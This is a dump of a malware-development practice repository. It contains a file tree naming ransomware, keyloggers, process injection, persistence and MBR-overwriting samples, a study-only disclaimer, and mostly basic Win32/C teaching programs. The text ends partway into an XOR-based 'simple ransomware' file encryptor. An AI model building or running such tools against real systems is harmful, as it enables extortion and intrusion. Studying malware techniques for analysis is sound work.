├── LICENSE
├── README.md
├── aes-crypt
├── aes-crypt.sln
├── aes-crypt
│ ├── aes-crypt.cpp
│ ├── aes-crypt.vcxproj
│ ├── aes-crypt.vcxproj.filters
│ └── aes-crypt.vcxproj.user
└── release
│ └── x64
│ ├── aes-crypt.zip
│ ├── secret-dec.txt
│ ├── secret-enc.txt
│ └── secret.txt
├── lma-poc
├── README.md
├── mingw
│ ├── ex00_messagebox.c
│ ├── ex01_print_string.c
│ ├── ex02_local_var.c
│ ├── ex03_global_var.c
│ ├── ex04_conditions.c
│ ├── ex05_x86_and_x64.c
│ ├── ex06_simple_file_handle.c
│ ├── ex07_clear_buffer.c
│ ├── ex08_function_pointer.c
│ ├── ex09_callback_function.c
│ ├── ex10_simple_ransomware.c
│ ├── ex11_simple_downloader.c
│ ├── ex12_simple_dropper.c
│ ├── simple_dll
│ │ ├── main.cpp
│ │ ├── main.h
│ │ ├── simple_dll.cbp
│ │ ├── simple_dll.depend
│ │ └── simple_dll.layout
│ └── xor_file.py
└── msvc
│ ├── Ex01_MessageBox
│ ├── Ex01_MessageBox.c
│ ├── Ex01_MessageBox.vcxproj
│ ├── Ex01_MessageBox.vcxproj.filters
│ └── Ex01_MessageBox.vcxproj.user
│ ├── Ex02_PrintString
│ ├── Ex02_PrintString.vcxproj
│ ├── Ex02_PrintString.vcxproj.filters
│ ├── Ex02_PrintString.vcxproj.user
│ └── Ex02_Print_String.c
│ ├── Ex03_LocalVariable
│ ├── Ex03_LocalVariable.vcxproj
│ ├── Ex03_LocalVariable.vcxproj.filters
│ ├── Ex03_LocalVariable.vcxproj.user
│ └── Ex03_Local_Variable.c
│ ├── Ex04_GlobalVariable
│ ├── Ex04_GlobalVariable.vcxproj
│ ├── Ex04_GlobalVariable.vcxproj.filters
│ ├── Ex04_GlobalVariable.vcxproj.user
│ └── Ex04_Global_Variable.c
│ ├── Ex05_Conditions
│ ├── Ex05_Conditions.c
│ ├── Ex05_Conditions.vcxproj
│ ├── Ex05_Conditions.vcxproj.filters
│ └── Ex05_Conditions.vcxproj.user
│ ├── Ex06_x86_x64_Architecture
│ ├── Ex06_x86_x64_Architecture.c
│ ├── Ex06_x86_x64_Architecture.vcxproj
│ ├── Ex06_x86_x64_Architecture.vcxproj.filters
│ └── Ex06_x86_x64_Architecture.vcxproj.user
│ ├── Ex07_FileHandle
│ ├── Ex07_FileHandle.vcxproj
│ ├── Ex07_FileHandle.vcxproj.filters
│ ├── Ex07_FileHandle.vcxproj.user
│ └── Ex07_File_Handle.c
│ ├── Ex08_BufferClean
│ ├── Ex08_BufferClean.vcxproj
│ ├── Ex08_BufferClean.vcxproj.filters
│ ├── Ex08_BufferClean.vcxproj.user
│ └── Ex08_Buffer_Clean.c
│ ├── Ex09_Function_Pointer
│ ├── Ex09_Function_Pointer.c
│ ├── Ex09_Function_Pointer.vcxproj
│ ├── Ex09_Function_Pointer.vcxproj.filters
│ └── Ex09_Function_Pointer.vcxproj.user
│ ├── Ex10_Callback_Function
│ ├── Ex10_Callback_Function.c
│ ├── Ex10_Callback_Function.vcxproj
│ ├── Ex10_Callback_Function.vcxproj.filters
│ └── Ex10_Callback_Function.vcxproj.user
│ ├── Ex11_Simple_Ransomware
│ ├── Ex11_Simple_Ransomware.c
│ ├── Ex11_Simple_Ransomware.vcxproj
│ ├── Ex11_Simple_Ransomware.vcxproj.filters
│ └── Ex11_Simple_Ransomware.vcxproj.user
│ ├── Ex12_1_Simple_DLL_No_Export
│ ├── Ex12_1_Simple_DLL_No_Export.c
│ ├── Ex12_1_Simple_DLL_No_Export.vcxproj
│ ├── Ex12_1_Simple_DLL_No_Export.vcxproj.filters
│ └── Ex12_1_Simple_DLL_No_Export.vcxproj.user
│ ├── Ex12_2_Simple_DLL_Func_Exported
│ ├── Ex12_2_Simple_DLL_Func_Exported.c
│ ├── Ex12_2_Simple_DLL_Func_Exported.vcxproj
│ ├── Ex12_2_Simple_DLL_Func_Exported.vcxproj.filters
│ └── Ex12_2_Simple_DLL_Func_Exported.vcxproj.user
│ ├── Ex13_Simple_Downloader
│ ├── Ex13_Simple_Downloader.c
│ ├── Ex13_Simple_Downloader.vcxproj
│ ├── Ex13_Simple_Downloader.vcxproj.filters
│ └── Ex13_Simple_Downloader.vcxproj.user
│ ├── Ex14_Simple_Dropper
│ ├── Ex14_Simple_Dropper.c
│ ├── Ex14_Simple_Dropper.rc
│ ├── Ex14_Simple_Dropper.vcxproj
│ ├── Ex14_Simple_Dropper.vcxproj.filters
│ ├── Ex14_Simple_Dropper.vcxproj.user
│ ├── evil.exe
│ ├── fluidicon.png
│ └── resource.h
│ ├── Ex15_Simple_Ransomware_AES128
│ ├── Ex15_Simple_Ransomware_AES128.c
│ ├── Ex15_Simple_Ransomware_AES128.vcxproj
│ ├── Ex15_Simple_Ransomware_AES128.vcxproj.filters
│ └── Ex15_Simple_Ransomware_AES128.vcxproj.user
│ ├── Ex16_Simple_Keylogger1
│ ├── Ex16_Simple_Keylogger1.c
│ ├── Ex16_Simple_Keylogger1.txt
│ ├── Ex16_Simple_Keylogger1.vcxproj
│ ├── Ex16_Simple_Keylogger1.vcxproj.filters
│ └── Ex16_Simple_Keylogger1.vcxproj.user
│ ├── Ex17_Simple_Keylogger2
│ ├── Ex17_Simple_Keylogger2.c
│ ├── Ex17_Simple_Keylogger2.vcxproj
│ ├── Ex17_Simple_Keylogger2.vcxproj.filters
│ └── Ex17_Simple_Keylogger2.vcxproj.user
│ ├── Ex18_1_Persistence_Run_Registry
│ ├── Ex18_1_Persistence_Run_Registry.c
│ ├── Ex18_1_Persistence_Run_Registry.rc
│ ├── Ex18_1_Persistence_Run_Registry.vcxproj
│ ├── Ex18_1_Persistence_Run_Registry.vcxproj.filters
│ ├── Ex18_1_Persistence_Run_Registry.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_2_Persistence_Scheduled_Task
│ ├── Ex18_2_Persistence_Scheduled_Task.c
│ ├── Ex18_2_Persistence_Scheduled_Task.rc
│ ├── Ex18_2_Persistence_Scheduled_Task.vcxproj
│ ├── Ex18_2_Persistence_Scheduled_Task.vcxproj.filters
│ ├── Ex18_2_Persistence_Scheduled_Task.vcxproj.user
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_3_Persistence_Startup_Folder
│ ├── Ex18_3_Persistence_Startup_Folder.c
│ ├── Ex18_3_Persistence_Startup_Folder.rc
│ ├── Ex18_3_Persistence_Startup_Folder.vcxproj
│ ├── Ex18_3_Persistence_Startup_Folder.vcxproj.filters
│ ├── Ex18_3_Persistence_Startup_Folder.vcxproj.user
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_4_Persistence_Winlogon_Registry
│ ├── Ex18_4_Persistence_Winlogon_Registry.c
│ ├── Ex18_4_Persistence_Winlogon_Registry.rc
│ ├── Ex18_4_Persistence_Winlogon_Registry.vcxproj
│ ├── Ex18_4_Persistence_Winlogon_Registry.vcxproj.filters
│ ├── Ex18_4_Persistence_Winlogon_Registry.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── RegBak
│ │ └── Winlogon.reg
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_5_Persistence_IFEO
│ ├── Ex18_5_Persistence_IFEO.c
│ ├── Ex18_5_Persistence_IFEO.rc
│ ├── Ex18_5_Persistence_IFEO.vcxproj
│ ├── Ex18_5_Persistence_IFEO.vcxproj.filters
│ ├── Ex18_5_Persistence_IFEO.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_6_Persistence_AppInit_DLLs
│ ├── Ex18_6_Persistence_AppInit_DLLs.c
│ ├── Ex18_6_Persistence_AppInit_DLLs.rc
│ ├── Ex18_6_Persistence_AppInit_DLLs.vcxproj
│ ├── Ex18_6_Persistence_AppInit_DLLs.vcxproj.filters
│ ├── Ex18_6_Persistence_AppInit_DLLs.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── evil.dll
│ └── resource.h
│ ├── Ex18_7_Persistence_Windows_Service
│ ├── Evil_WS.exe
│ ├── Ex18_7_Persistence_Windows_Service.c
│ ├── Ex18_7_Persistence_Windows_Service.rc
│ ├── Ex18_7_Persistence_Windows_Service.vcxproj
│ ├── Ex18_7_Persistence_Windows_Service.vcxproj.filters
│ ├── Ex18_7_Persistence_Windows_Service.vcxproj.user
│ └── resource.h
│ ├── Ex19_Simple_Windows_Service
│ ├── Ex19_Simple_Windows_Service.c
│ ├── Ex19_Simple_Windows_Service.vcxproj
│ ├── Ex19_Simple_Windows_Service.vcxproj.filters
│ └── Ex19_Simple_Windows_Service.vcxproj.user
│ └── VS_2017_Proj.sln
├── mbr-overwriting
├── README.md
├── mbr-overwriting.sln
├── mbr-overwriting
│ ├── mbr-overwriting.cpp
│ ├── mbr-overwriting.vcxproj
│ ├── mbr-overwriting.vcxproj.filters
│ └── mbr-overwriting.vcxproj.user
└── release
│ └── x64
│ └── mbr-overwriting.zip
├── process-injection
├── README.md
├── code-cave-injection
│ └── code-cave-injection.cpp
├── hook-injection
│ └── hook-injection.cpp
├── portable-executable-injection
│ └── pe-injection.cpp
├── process-hollowing
│ └── process-hollowing.cpp
├── registry-modification
│ └── registry-modification.cpp
├── remote-dll-injection
│ └── dll-injection.cpp
├── test-lib
│ ├── dllmain.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ └── testLibs.cpp
├── test-messagebox
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ └── testMessageBox.cpp
└── thread-execution-hijacking
│ └── thread-execution-hijacking.cpp
├── simple-dll
├── dll-no-export
│ ├── dll-no-export.vcxproj
│ ├── dll-no-export.vcxproj.filters
│ ├── dll-no-export.vcxproj.user
│ └── dllmain.c
├── dll-with-exported
│ ├── dll-with-exported.vcxproj
│ ├── dll-with-exported.vcxproj.filters
│ ├── dll-with-exported.vcxproj.user
│ └── dllmain.c
├── release
│ └── x64
│ │ ├── dll-no-export.zip
│ │ └── dll-with-exported.zip
└── simple-dll.sln
├── simple-downloader
├── release
│ └── x64
│ │ └── simple-downloader.zip
├── simple-downloader.sln
└── simple-downloader
│ ├── simple-downloader.c
│ ├── simple-downloader.vcxproj
│ ├── simple-downloader.vcxproj.filters
│ └── simple-downloader.vcxproj.user
├── simple-dropper
├── release
│ └── x64
│ │ └── simple-dropper.zip
├── simple-dropper.sln
└── simple-dropper
│ ├── bin
│ ├── evil.exe
│ └── fluidicon.png
│ ├── resource.h
│ ├── simple-dropper.aps
│ ├── simple-dropper.c
│ ├── simple-dropper.rc
│ ├── simple-dropper.vcxproj
│ ├── simple-dropper.vcxproj.filters
│ └── simple-dropper.vcxproj.user
├── simple-encryption
├── release
│ └── x64
│ │ └── simple-encryption.zip
├── simple-encryption.sln
└── simple-encryption
│ ├── simple-encryption.c
│ ├── simple-encryption.vcxproj
│ ├── simple-encryption.vcxproj.filters
│ └── simple-encryption.vcxproj.user
├── simple-keylogger
├── hooking-keylogger
│ ├── hooking-keylogger.c
│ ├── hooking-keylogger.vcxproj
│ ├── hooking-keylogger.vcxproj.filters
│ └── hooking-keylogger.vcxproj.user
├── polling-keylogger
│ ├── polling-keylogger.c
│ ├── polling-keylogger.vcxproj
│ ├── polling-keylogger.vcxproj.filters
│ └── polling-keylogger.vcxproj.user
├── release
│ └── x64
│ │ ├── hooking-keylogger.zip
│ │ └── polling-keylogger.zip
└── simple-keylogger.sln
└── simple-persistence
├── appinit-dlls
├── appinit-dlls.aps
├── appinit-dlls.c
├── appinit-dlls.rc
├── appinit-dlls.vcxproj
├── appinit-dlls.vcxproj.filters
├── appinit-dlls.vcxproj.user
├── bin
│ └── evil.dll
├── reg
│ └── Windows.reg
├── registry.c
├── registry.h
└── resource.h
├── image-file-execution-options
├── bin
│ └── evil.exe
├── image-file-execution-options.aps
├── image-file-execution-options.c
├── image-file-execution-options.rc
├── image-file-execution-options.vcxproj
├── image-file-execution-options.vcxproj.filters
├── image-file-execution-options.vcxproj.user
├── registry.c
├── registry.h
└── resource.h
├── release
└── x64
│ ├── appinit-dlls.zip
│ ├── image-file-execution-options.zip
│ ├── run-registry.zip
│ ├── scheduled-task.zip
│ ├── startup-folder.zip
│ ├── windows-service.zip
│ └── winlogon-registry.zip
├── run-registry
├── bin
│ └── evil.exe
├── registry.c
├── registry.h
├── resource.h
├── run-registry.aps
├── run-registry.c
├── run-registry.rc
├── run-registry.vcxproj
├── run-registry.vcxproj.filters
└── run-registry.vcxproj.user
├── scheduled-task
├── bin
│ └── evil.exe
├── resource.h
├── scheduled-task.aps
├── scheduled-task.c
├── scheduled-task.rc
├── scheduled-task.vcxproj
├── scheduled-task.vcxproj.filters
└── scheduled-task.vcxproj.user
├── simple-persistence.sln
├── startup-folder
├── bin
│ └── evil.exe
├── resource.h
├── startup-folder.aps
├── startup-folder.c
├── startup-folder.rc
├── startup-folder.vcxproj
├── startup-folder.vcxproj.filters
└── startup-folder.vcxproj.user
├── windows-service
├── bin
│ └── evil-service.exe
├── resource.h
├── windows-service.aps
├── windows-service.c
├── windows-service.rc
├── windows-service.vcxproj
├── windows-service.vcxproj.filters
└── windows-service.vcxproj.user
└── winlogon-registry
├── bin
└── evil.exe
├── reg
└── Winlogon.reg
├── registry.c
├── registry.h
├── resource.h
├── winlogon-registry.aps
├── winlogon-registry.c
├── winlogon-registry.rc
├── winlogon-registry.vcxproj
├── winlogon-registry.vcxproj.filters
└── winlogon-registry.vcxproj.user
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 Hai Le Hong
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## Disclaimer
2 |
3 | The purpose of this repository is to allow the study of malware. I am not responsible for any damage caused by the malware inside this repository or by your negligence in general. Use it only against systems that you are permitted to attack.
4 |
5 |
6 | ## Common Malware Techniques
7 | - Downloader
8 | - Dropper
9 | - Process Injection
10 | - Code cave injection
11 | - Hook injection
12 | - Portable executable injection
13 | - Process hollowing
14 | - Registry modification
15 | - Remote dll injection
16 | - Thread execution hijacking
17 | - Encryption:
18 | - AES
19 | - XOR
20 | - Keylogger:
21 | - Polling keylogger
22 | - Hooking keylogger
23 | - Persistence Mechanisms:
24 | - AppInit dlls
25 | - Image file execution options
26 | - Registry run keys
27 | - Scheduled tasks
28 | - Startup folder
29 | - Windows service
30 | - Winlogon helper dll
31 | - Others:
32 | - MBR overwriting
33 |
--------------------------------------------------------------------------------
/aes-crypt/aes-crypt.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aes-crypt", "aes-crypt\aes-crypt.vcxproj", "{3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Debug|x64.ActiveCfg = Debug|x64
17 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Debug|x86.ActiveCfg = Debug|Win32
18 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x64.ActiveCfg = Release|x64
19 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x64.Build.0 = Release|x64
20 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x86.ActiveCfg = Release|Win32
21 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {577D5C1D-DADF-4047-A7CC-D5F76DF10BB1}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/aes-crypt/aes-crypt/aes-crypt.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/aes-crypt/aes-crypt/aes-crypt.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/aes-crypt/release/x64/aes-crypt.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/aes-crypt/release/x64/aes-crypt.zip
--------------------------------------------------------------------------------
/aes-crypt/release/x64/secret-dec.txt:
--------------------------------------------------------------------------------
1 | Lorem Ipsum is simply dummy text of the printing and typesetting industry.
2 | Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.
3 | It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.
4 | It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
--------------------------------------------------------------------------------
/aes-crypt/release/x64/secret-enc.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/aes-crypt/release/x64/secret-enc.txt
--------------------------------------------------------------------------------
/aes-crypt/release/x64/secret.txt:
--------------------------------------------------------------------------------
1 | Lorem Ipsum is simply dummy text of the printing and typesetting industry.
2 | Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.
3 | It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.
4 | It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
--------------------------------------------------------------------------------
/lma-poc/README.md:
--------------------------------------------------------------------------------
1 | ## Learning Malware Analysis
2 |
--------------------------------------------------------------------------------
/lma-poc/mingw/ex00_messagebox.c:
--------------------------------------------------------------------------------
1 | #include
2 | // For hide console windows: -mwindows
3 | // $ gcc.exe .\ex00_messagebox.c -mwindows -o .\bin\ex00_messagebox
int main() {
    /* Show one informational dialog and exit. The sample is meant to be
       built with -mwindows (see the comment above) so that no console
       window appears next to the box. */
    const char *text = "Hello, World!";
    const char *caption = "Hi!";
    MessageBoxA(NULL, text, caption, MB_OK | MB_ICONINFORMATION);
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/mingw/ex01_print_string.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int main() {
    /* Print a fixed string literal (no trailing newline). The pointer refers
       to read-only string data, which is what a reader of the compiled
       binary will find in the data section. */
    const char *message = "Lorem Ipsum is simply dummy text.";
    fputs(message, stdout);
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/mingw/ex02_local_var.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int main()
{
    /* Two stack-local ints: x is initialised, y is assigned from x. Nothing
       is printed or returned from them; presumably the sample exists only to
       observe how the compiler lays out locals (judging by the file name). */
    int x = 1;
    int y;
    y = x;
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/mingw/ex03_global_var.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int a;   /* file-scope globals: static storage, zero-initialised before main runs */
char b;  /* both are only written in main below */
6 |
int main()
{
    /* Touches the globals in several ways - a direct store, a load into a
       local, taking the address - plus a pointer to a string literal. None
       of the locals are used afterwards; presumably each access pattern is
       meant to be looked up in the compiled output. */
    a = 41;
    b = 'A';
    int x = a;
    int *y = &a;
    char *string = "test";
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/mingw/ex04_conditions.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int main()
{
    /* The branch is always taken (x == 0) and its store is immediately
       overwritten by x = 2, so an optimising build may drop both the
       comparison and the stores; presumably the sample is meant to be
       compared at -O0 and -O2. */
    int x = 0;
    if (x == 0)
    {
        x = 5;
    }
    x = 2;
    return 0;
}
--------------------------------------------------------------------------------
/lma-poc/mingw/ex05_x86_and_x64.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int main()
{
    /* One call with eight mixed int/string arguments: more than the four
       register arguments of the x64 Windows calling convention, so the
       remaining ones are passed on the stack - presumably the point of
       comparing the x86 and x64 builds of this file. */
    printf("%d %s %d %s %d %s %s %s", 1, "Two", 3, "FOUR", 555, "sIx!", "777", "eiGht-888");
    return 0;
}
9 |
--------------------------------------------------------------------------------
/lma-poc/mingw/ex06_simple_file_handle.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
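int main()
{
    char cwd[MAX_PATH];
    char filePath[MAX_PATH];

    // Current working directory. GetCurrentDirectoryA returns 0 on failure
    // and the required length when the buffer is too small; in both cases
    // the buffer does not hold a usable path.
    DWORD cwdLen = GetCurrentDirectoryA(MAX_PATH, cwd);
    if (cwdLen == 0 || cwdLen >= MAX_PATH) {
        printf(" [-] Cannot obtain current directory.\n"); exit(1);
    }

    // Format path to save file. The previous code formatted filePath into
    // itself (overlapping source and destination is undefined behaviour);
    // build the path from a separate buffer and reject one that would not fit.
    int written = snprintf(filePath, sizeof filePath, "%s\\simple_file_handle.txt", cwd);
    if (written < 0 || (size_t)written >= sizeof filePath) {
        printf(" [-] Path too long.\n"); exit(1);
    }

    printf(" [+] Win32 API Example: CreateFile, WriteFile.\n");
    // CREATE_NEW fails (INVALID_HANDLE_VALUE) when the file already exists.
    HANDLE hFile = CreateFileA(filePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        printf(" [-] Invalid handle file.\n"); exit(2);
    }

    char buffer[] = "Lorem Ipsum is simply dummy text of the printing and typesetting industry.";
    DWORD bufferSize = (DWORD)(sizeof buffer - 1);   // exclude the terminating NUL
    DWORD bytesWritten = 0;
    BOOL ok = WriteFile(hFile, buffer, bufferSize, &bytesWritten, NULL);
    CloseHandle(hFile);

    // A failed or short write previously went unnoticed and the program
    // still reported success via its exit status.
    if (!ok || bytesWritten != bufferSize) {
        printf(" [-] WriteFile failed or wrote fewer bytes than requested.\n"); exit(3);
    }

    return 0;
}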
--------------------------------------------------------------------------------
/lma-poc/mingw/ex07_clear_buffer.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
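/* Read one line from stdin into buf (at most size-1 characters) and drop
 * the trailing newline. When the line is longer than the buffer the excess
 * is consumed so it cannot spill into the next prompt. Returns 1 when a
 * line was read, 0 on EOF (buf is then empty). Replaces gets(), which has
 * no bound and was removed from the C standard. */
static int readLine(char *buf, size_t size)
{
    if (fgets(buf, (int)size, stdin) == NULL) {
        buf[0] = '\0';
        return 0;
    }
    size_t len = 0;
    while (buf[len] != '\0' && buf[len] != '\n') len++;
    if (buf[len] == '\n') {
        buf[len] = '\0';
    } else {
        /* line did not fit: discard the rest of it */
        int c;
        while ((c = getchar()) != '\n' && c != EOF) {}
    }
    return 1;
}

int main()
{
    char name[25], country[20];
    int age, c;

    printf("Name = ");
    readLine(name, sizeof name);

    printf("Age = ");
    // scanf leaves age uninitialised when the token is not a number.
    if (scanf("%d", &age) != 1) {
        printf("Invalid age\n");
        return 1;
    }

    // Discard the rest of the line (at least the newline after the number)
    // so that the next line-oriented read does not return an empty string.
    while ((c = getchar()) != '\n' && c != EOF) {}

    printf("Country = ");
    readLine(country, sizeof country);

    printf("Name: %s, Country: %s, Age: %d\n", name, country, age);

    return 0;
}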
24 |
--------------------------------------------------------------------------------
/lma-poc/mingw/ex08_function_pointer.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int Add(int a, int b) {
    /* Sum of the two operands (plain int arithmetic, no overflow check). */
    int total = a;
    total += b;
    return total;
}
7 |
int Mul(int a, int b) {
    /* Product of the two operands (plain int arithmetic, no overflow check). */
    int product = a;
    product *= b;
    return product;
}
11 |
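int main()
{
    typedef int(*ptrFunc)(int, int);

    printf("[ + ] Initialize local variable and function pointer!\n");
    ptrFunc ptrAdd = NULL, ptrMul = NULL;
    int x = 0, y = 0;

    printf("[ + ] Assigned Ptr.\n");
    ptrAdd = &Add;
    ptrMul = &Mul;

    // Each scanf result is checked: a non-numeric token previously left the
    // variable at 0 and the program silently computed with that value.
    printf("[ + ] Please input numer:\n");
    printf("number x = ");
    if (scanf("%d", &x) != 1) {
        printf("[ - ] Invalid input for x.\n");
        return 1;
    }
    printf("number y = ");
    if (scanf("%d", &y) != 1) {
        printf("[ - ] Invalid input for y.\n");
        return 1;
    }

    // Both calls go through the function pointers, not the functions directly.
    printf("%d + %d = %d\n", x, y, ptrAdd(x, y));
    printf("%d * %d = %d\n", x, y, ptrMul(x, y));

    return 0;
}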
--------------------------------------------------------------------------------
/lma-poc/mingw/ex09_callback_function.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
int Add(int a, int b) {
    /* a + b; operand order is irrelevant for addition. */
    return b + a;
}
7 |
int Mul(int a, int b) {
    /* a * b; operand order is irrelevant for multiplication. */
    return b * a;
}
11 |
typedef int(*Calculator)(int, int); /* pointer to a binary int operation such as Add or Mul */
13 |
int superCalculator(int a, int b, Calculator ptrCalFunc) {
    /* Apply the caller-supplied operation to (a, b). The callback is not
       checked for NULL, exactly as before. */
    Calculator op = ptrCalFunc;
    int result = op(a, b);
    return result;
}
17 |
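int main()
{
    printf("[ + ] Local variable Initialized.\n");
    int x = 0, y = 0;

    // Each scanf result is checked: a non-numeric token previously left the
    // variable at 0 and the program silently computed with that value.
    printf("[ + ] Please input numer:\n");
    printf("number x = ");
    if (scanf("%d", &x) != 1) {
        printf("[ - ] Invalid input for x.\n");
        return 1;
    }
    printf("number y = ");
    if (scanf("%d", &y) != 1) {
        printf("[ - ] Invalid input for y.\n");
        return 1;
    }

    // Add and Mul are passed as callbacks; superCalculator just invokes them.
    printf("%d + %d = %d\n", x, y, superCalculator(x, y, Add));
    printf("%d * %d = %d\n", x, y, superCalculator(x, y, Mul));

    return 0;
}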
--------------------------------------------------------------------------------
/lma-poc/mingw/ex10_simple_ransomware.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | /*
6 | ** Name : SFET - Simple File Encryption Tool
7 | ** Version : v0.1 - Beta version
8 | ** Crypto Algorithm support: XOR (AES, RSA, hashing, etc. are coming)
9 | ** Compiler : MinGW/Gcc v8.1, Linux Gcc v9.3
10 | */
11 |
/* Print the usage line with the program name supplied by the caller.
 * NOTE(review): the text lists no argument placeholders after the name,
 * although main() expects <input file> <key> <output file>; presumably the
 * angle-bracketed placeholders were lost from the source - confirm. */
void printf_usage(char *str)
{
    printf(" [+] Usage: %s \n", str);
}
16 |
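/* Return 1 when key is a non-empty string of decimal digits, 0 otherwise.
 * An empty string previously passed the check and atoi() turned it into 0,
 * i.e. an "encryption" that leaves every byte unchanged. A NULL key is
 * rejected as well instead of being dereferenced. */
int isValidXorKey(const char *key)
{
    if (key == NULL || key[0] == '\0')
        return 0;
    for (size_t i = 0; key[i] != '\0'; i++)
        if (key[i] < '0' || key[i] > '9')
            return 0;
    return 1;
}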
26 |
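/* Return the size in bytes of the file named filename. Any failure (cannot
 * open, cannot seek, cannot tell) prints an error and exits with 2. */
unsigned long long getSizeOfFile(char *filename)
{
    FILE *fptr = fopen(filename, "rb");
    if (fptr == NULL) {
        printf(" [-] Error! Opening file \'%s\' for calculating size.\n", filename); exit(2);
    }

    if (fseek(fptr, 0L, SEEK_END) != 0) {
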